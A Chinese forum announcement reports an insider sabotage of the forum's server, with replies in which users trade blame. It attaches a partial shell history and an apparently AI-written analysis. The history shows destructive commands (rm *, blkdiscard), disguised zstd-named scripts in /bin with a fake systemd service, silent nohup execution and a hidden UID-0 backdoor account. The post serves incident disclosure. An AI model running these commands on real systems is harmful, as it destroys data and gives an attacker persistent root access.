关于论坛遭受内部人员攻击的公告

阳光彩虹小白猹

尊敬的各位用户：
  很抱歉地通知大家，个别管理团队成员因为管理团队内部纠纷，在论坛服务器中植入了定时自毁程序。本人在昨日晚上巡视服务器时发现了异常，立即备份了所有数据，并尽力采取必要的措施。但不幸的是，破坏者植入的自毁程序仍于今日夜间发作，销毁了网站数据。所幸管理团队利用昨日备份的数据，成功将论坛恢复至昨日晚间的状态，没有出现大规模的数据丢失。昨日19时前的数据全部得以保留。
  对于这次意外事件，本人和管理团队感到十分心痛。管理团队在原地铁e族关闭、新站建立初期就早已决定绝不走地铁族、原地铁e族的老路，将用户数据视若珍宝，用实际行动回应广大用户的辛苦付出。然而，破坏者只因管理团队存在内部矛盾，就公然在服务器植入自毁程序，全然不顾论坛的稳定运营，妄图在服务器自毁后将网站损毁的罪责推到本人身上，以吸引舆论攻击本人。破坏者的行为完全背离了其建立地铁e族论坛的初衷，也违背了其之前对用户许下的的庄严承诺，管理团队对破坏者的行为表示强烈谴责！
  尽管管理团队采取了一定措施防范今后可能出现的攻击行为，但破坏者今后仍可能继续攻击论坛服务器。论坛服务器亦有可能再次因遭受攻击导致停机或丢失少量数据，敬请各位用户谅解。管理团队建议各位用户及时修改账号密码，以防账号被盗。
  附1：破坏者执行的用于实施破坏的代码（部分）

1. 152  vim php-fpm.conf
   
2.   153  vim php-fpm.conf
   
3.   154  cd /root
   
4.   155  ls
   
5.   156  rm database20260526_1346.txt
   
6.   157  rm *
   
7.   158  ls
   
8.   159  reboot
   
9.   160  systemctl stop my-nginx
   
10.   161  systemctl stop php-fpm
    
11.   162  systemctl restart mariadb
    
12.   163  cd /var/www
    
13.   164  ls
    
14.   165  mysqldump -u root -p discuz > database_20260531_1310.txt
    
15.   166  ls
    
16.   167  7z a web_20260531_1310.7z discuz
    
17.   168  rm database_20260531_1310.txt
    
18.   169  systemctl restart php-fpm
    
19.   170  systemctl restart my-nginx
    
20.   171  rm web_20260531_1310.7z
    
21.   172  ls
    
22.   173  cd discuz
    
23.   174  ls
    
24.   175  cd ..
    
25.   176  cd /
    
26.   177  ls
    
27.   178  cd bin
    
28.   179  ls -al
    
29.   180  vim zstdoo
    
30.   181  chown root:root zstdoo
    
31.   182  chmod 777 zstdoo
    
32.   183  zstdoo
    
33.   184  cd /dev/block
    
34.   185  ls -al
    
35.   186  blkdiscard
    
36.   187  cd /bin
    
37.   188  vim zstdoo
    
38.   189  sleep 15h
    
39.   190  sleep --help
    
40.   191  vim zstdv2
    
41.   192  ls -al /dev/block
    
42.   193  ls -al /dev
    
43.   194  vim zstdv2
    
44.   195  chmod 777 zstdv2
    
45.   196  vim zstdoo
    
46.   197  ls -al /dev/block
    
47.   198  vim zstdoo
    
48.   199  vim zstdv2
    
49.   200  ls -al
    
50.   201  cd /etc/systemd/system/
    
51.   202  vim zstd_compressor.service
    
52.   203  cd /bin
    
53.   204  vim zstdv2
    
54.   205  vim zstdv2
    
55.   206  vim zstdoo
    
56.   207  vim zstdv0
    
57.   208  cat zstdv0
    
58.   209  chmod 777 zstdv0
    
59.   210  cd ~
    
60.   211  zstdv0
    
61.   212  nohup zstdv0
    
62.   213  ls
    
63.   214  rm nohup.out
    
64.   215  nohup zstdv0 > /dev/null 2>&1 & echo $!
    
65.   216  ps -A | grep 28864
    
66.   217  kill 28864
    
67.   218  ps -A
    
68.   219  kill 28865
    
69.   220  systemctl darmon-reload
    
70.   221  systemctl daemon-reload
    
71.   222  systemctl is_enabled zstd_compressor
    
72.   223  systemctl is-enabled zstd_compressor
    
73.   224  vim /bin/zstdv2
    
74.   225  ps -A
    
75.   226  kill 28952
    
76.   227  clear
    
77.   228  du
    
78.   229  pwd
    
79.   230  useradd -o -u 0 -g 0 -m -s /bin/bash snihty888
    
80.   231  passwd snihty888

复制代码

附2：AI工具Gimini对上述代码的分析报告

这段历史命令记录了一个从常规运维演变为可疑后门植入与系统破坏测试的完整过程。

我们可以将这 80 条命令划分为以下五个阶段来详细解析：

第一阶段：常规的 Web 站点维护与清理 (152 - 159)
操作： 检查了 php-fpm.conf 配置文件，随后进入 /root 目录，删除了旧的数据库备份文件 database20260526_1346.txt，并通过 rm * 清空了该目录下的所有文件。

结果： 清理了 root 用户的家目录空间，并执行了 reboot 重启系统以应用更改。

第二阶段：Discuz! 论坛的数据备份与测试 (160 - 177)
操作： 1. 停止了 Nginx 和 PHP-FPM 服务，重启了 MariaDB 数据库。
2. 进入 /var/www 目录，使用 mysqldump 导出了名为 discuz 的数据库。
3. 使用 7z 将论坛程序目录打包压缩为 web_20260531_1310.7z。

反常行为： 在备份完成后，该用户紧接着就把刚刚生成的数据库备份和网页备份打包文件全部删除了（rm ...），随后重新启动了 Web 服务。这通常表明他们只是在测试备份流程，或者在本地/临时转移了数据。

第三阶段：高危破坏性命令测试与可疑脚本编写 (178 - 200)
操作： 1. 进入系统核心二进制目录 /bin，创建并编辑了一个名为 zstdoo 的文件，将其权限赋为 777（全所有人可读写执行）。
2. 切换到磁盘设备目录 /dev/block，并执行了 blkdiscard 命令。

高危警告： blkdiscard 是一个极度危险的命令，它会直接向固态硬盘或块设备发送 SSD TRIM 指令，瞬间抹除块设备上的所有数据且几乎无法恢复。
3. 随后，该用户开始频繁修改和迭代一系列以 zstd 命名的自定义脚本（包括 zstdoo、zstdv2 等）。虽然 zstd 本身是一种大名鼎鼎的现代压缩算法，但这里的用法显然是借用了其名称作为伪装。

第四阶段：配置持久化与后台静默运行 (201 - 229)
操作：

进入系统服务目录 /etc/systemd/system/，创建了一个名为 zstd_compressor.service 的系统服务。

试图通过 systemctl daemon-reload 和 systemctl is-enabled 将该服务注册为系统自启动服务（再次利用“压缩工具”的名称进行伪装）。

在测试服务时，可能遇到了问题，于是转而使用 nohup zstdv0 > /dev/null 2>&1 & 强行将脚本置于绝对静默的后台运行（不产生任何日志输出）。

随后通过 ps -A 和 kill 命令，对产生的进程 PID 进行调试和清理。

第五阶段：植入 Root 级别后门账号 (230 - 231)
操作： ```bash
useradd -o -u 0 -g 0 -m -s /bin/bash snihty888
passwd snihty888

安全事件： 这是典型的黑客或留后门行为。-u 0 和 -o 参数允许创建一个人为指定的、拥有最高 Root 权限的超级用户，并将其命名为 snihty888。这意味着即使真正的 root 密码被修改，攻击者仍可以通过这个隐藏的影子账号随时远程登录并完全控制这台服务器。

总结
如果这段命令不是你本人在高度隔离的沙箱或测试机中进行防御性演练，那么该服务器极有可能已经遭受严重的恶意入侵。攻击者不仅测试了能够彻底摧毁磁盘数据的命令，还在系统中成功留下了常驻后台的恶意脚本和具备最高权限的后门账号。

岗厦北站

感谢论坛管理团队的努力工作，那么快就恢复正常啦

mickeynst

加油！希望数据能一直保存下去

xiaoyun94

可以报警的程度了？

657657

破坏者是谁啊，这个吊毛

lake

所以破坏者是谁呢？

阳光彩虹小白猹

经初步调查，本人只将服务器平台密码交给过@TMS19666，并只授权其一个人对服务器进行维护 。因此无论破坏者为何人，@TMS19666 均负有不可推卸的责任。
另外，@snihty 在没有任何证据的情况下反过来污蔑本次事故系本人自导自演的一场戏，目的在于把攻击服务器的责任嫁祸给@snihty 和@TMS19666 。其说法明显与客观事实不符。本人加入论坛管理团队已经数年了，自认为没做什么对不起大家的事情，更不可能亲手毁掉大家苦心经营的心血！至于破坏者究竟是谁，真相究竟如何，我相信人在做，天在看！
感谢各位坛友对此事的关心。
@657657 @lake

snihty

阳光彩虹小白猹 发表于 2026-6-3 12:32
经初步调查，本人只将服务器平台密码交给过@TMS19666，并只授权其一个人对服务器进行维护 。因此无论破坏者 ...

你不要拿炸服务器来威胁全体用户就行

Qazwsaedx

一百歲唔死都有新聞睇

严禁热灰入桶

从用户的角度劝诫二位前版主，管理团队内部的矛盾是你们自己的事情。很大一部分用户是不关心你们之间的琐事的。你们尤其不应该因为私人恩怨而销毁论坛数据。论坛数据是大家的，不是你管理的私有财产。
你俩没被永久封号就偷着乐呵吧。从我的角度看，你俩要和coac一起钉在历史的耻辱柱上。